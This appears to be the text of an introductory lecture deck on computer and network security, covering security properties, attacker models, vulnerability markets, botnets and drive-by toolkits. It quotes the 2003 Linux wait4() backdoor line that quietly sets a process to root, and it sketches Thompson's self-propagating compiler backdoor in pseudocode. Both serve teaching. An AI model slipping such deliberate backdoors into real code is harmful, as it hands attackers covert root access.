Computer and Network Security

Computer and Network Security

What’s this course about? • Intro to computer and network security • Some challenging fun projects • Learn about attacks • Learn about preventing attacks • Lectures on related topics • Application and operating system security • Web security • Network security, Mobile app security Not a course on cryptography

Organization (subject to change) • Application and OS security • Buffer overflow project • Vulnerabilities: control hijacking attacks, fuzzing • Prevention: System design, robust coding, isolation • Web security • Web site attack and defenses project • Browser policies, session mgmt, user authentication • HTTPS and web application security • Network security • Network traceroute and packet filtering project • Protocol designs, vulnerabilities, prevention • Malware, botnets, DDoS, network security testing • A few other topics • Cryptography (user perspective), digital rights management

General course info • Prerequisite: • Programming Languages, Operating systems • Textbook: none – reading online • Coursework • 2 projects, final exam

Security Concepts

What is security? • System correctness • If user supplies expected input, system generates desired output • Security • If attacker supplies unexpected input, system does not fail in certain ways

What is security? • System correctness • Good input  Good output • Security • Bad input  Bad output

What is security? • System correctness • More features: better • Security • More features: can be worse

Security properties • Confidentiality • Information about system or its users cannot be learned by an attacker • Integrity • The system continues to operate properly, only reaching states that would occur if there were no attacker • Availability • Actions by an attacker do not prevent users from having access to use of the system

General picture System • Security is about • Honest user (e.g., Alice, Bob, …) • Dishonest Attacker • How the Attacker • Disrupts honest user’s use of the system (Integrity, Availability) • Learns information intended for Alice only (Confidentiality) Alice Attacker

Network security Network Attacker Intercepts and controls network communication System Alice

Web security System Web Attacker Sets up malicious site visited by victim; no control of network Alice

Operating system security OS Attacker Controls malicious files and applications Alice

System Alice Attacker Confidentiality: Attacker does not learn Alice’s secrets Integrity: Attacker does not undetectably corrupt system’s function for Alice Availability: Attacker does not keep system from being useful to Alice

Trends and statistics

The computer security problem • Lots of buggy software (and gullible users) • Money can be made from finding and exploiting vulnerabilities. • Marketplace for vulnerabilities • Marketplace for owned machines (PPI) • Many methods to profit from owned client machines

MITRE tracks vulnerability disclosures Cumulative Disclosures Percentage from Web applications 2010 Source: IBM X-Force, Mar 2011 Data: http://cve.mitre.org/

Reported Web Vulnerabilities "In the Wild" Data from aggregator and validator of NVD-reported vulnerabilities

Web vs System vulnerabilities • Decline in % web vulns since 2009 • 49% in 2010 -> 37% in 2011. • Big decline in SQL Injection vulnerabilities XSS peak

Mobile Operating Systems Mobile OS Exploits Mobile OS Vulnerabilities Source: IBM X-Force, Mar 2011

Phishing?

Bot networks • Continue to be major problem (e.g., Spam)

The Marketplace forVulnerabilities

Marketplace for Vulnerabilities Option 1: bug bounty programs • Google Vulnerability Reward Program: 3K $ • Mozilla Bug Bounty program: 500$ • Pwn2Own competition: 15K $ Option 2: • ZDI, iDefense: 2K – 25K $

Marketplace for Vulnerabilities Option 3: black market Source: Charlie Miller (securityevaluators.com/files/papers/0daymarket.pdf)

Marketplace for owned machines clients spam bot keylogger Pay-per-install (PPI) services • Own victim’s machine • Download and install client’s code • Charge client PPI service Cost: US 100-180$ / 1000 machines Asia 7-8$ / 1000 machines Victims Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

Attacker Goals, Examples

The computer security problem • Lots of buggy software (and gullible users) • Money can be made from finding and exploiting vulnerabilities. • Marketplace for vulnerabilities • Marketplace for owned machines (PPI) • Many methods to profit from owned client machines

Why own machines: IP address and bandwidth stealing Attacker’s goal: look like a random Internet user Use the infected machine’s IP address for: • Spam (e.g. the storm botnet) Spamalytics: 1:12M pharma spams leads to purchase 1:260K greeting card spams leads to infection • Denial of Service: • Services: 1 hour (20$), 24 hours (100$) • Click fraud (e.g. Clickbot.a)

Why own machines: Steal user credentials keylog for banking passwords, web passwords, gaming pwds Example: SilentBanker (2007) User requests login page Malware injects Javascript Bank sends login page needed to log in Bank When user submits information, also sent to attacker Similar mechanism used by Zeus botnet

Why own machines: Spread to isolated systems Example: Stuxtnet Windows infection ⇒ Siemens PCS 7 SCADA control software on Windows ⇒ Siemens device controller on isolated network

Drive-by Downloads

Web attack toolkit: MPack • Basic setup • Toolkit hosted on web server • Infects pages on that server • Page visitors get infected • Features • Customized: determines exploit on the fly, based on user’s OS, browser, etc • Easy to use: management console provides stats on infection rates • Customer care toolkit can be purchased with one-year support contract!

Insider attacks: example Hidden trap door in Linux(Nov. 2003) • Allows attacker to take over a computer • Practically undetectable change (uncovered via CVS logs) Inserted line in wait4() Looks like a standard error check, but … if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; See: http://lwn.net/Articles/57135/

What can you trust?

Ken Thompson • What code can we trust? • Consider "login" or "su" in Unix • Is RedHat binary reliable? • Does it send your passwd to someone? • Can't trust binary so check source, recompile • Read source code or write your own • Does this solve problem? Reflections on Trusting Trust, http://www.acm.org/classics/sep95/

Compiler backdoor • This is the basis of Thompson's attack • Compiler looks for source code that looks like login program • If found, inserts login backdoor (allow special user to log in) • How do we solve this? • Inspect the compiler source

C compiler is written in C • Change compiler source S compiler(S) { if (match(S, "login-pattern")) { compile (login-backdoor) return } if (match(S, "compiler-pattern")) { compile (compiler-backdoor) return } .... /* compile as usual */ }

Clever trick to avoid detection • Compile this compiler and delete backdoor tests from source • Someone can compile standard compiler source to get new compiler, then compile login, and get login with backdoor • Simplest approach will only work once • Compiling the compiler twice might lose the backdoor • But can making code for compiler backdoor output itself • (Can you write a program that prints itself? Recursion thm) • Read Thompson's article • Short, but requires thought

Concluding …

Ethical use of security information • We discuss vulnerabilities and attacks • Most vulnerabilities have been fixed • Some attacks may still cause harm • Do not try these at home or anyplace else • Purpose of this class • Learn to prevent malicious attacks • Use knowledge for good purposes

If you remember only one thing from this course: A vulnerability that is “too complicated for anyone to ever find” will be found and exploited ! We hope you remember more than one thing

Computer and Network Security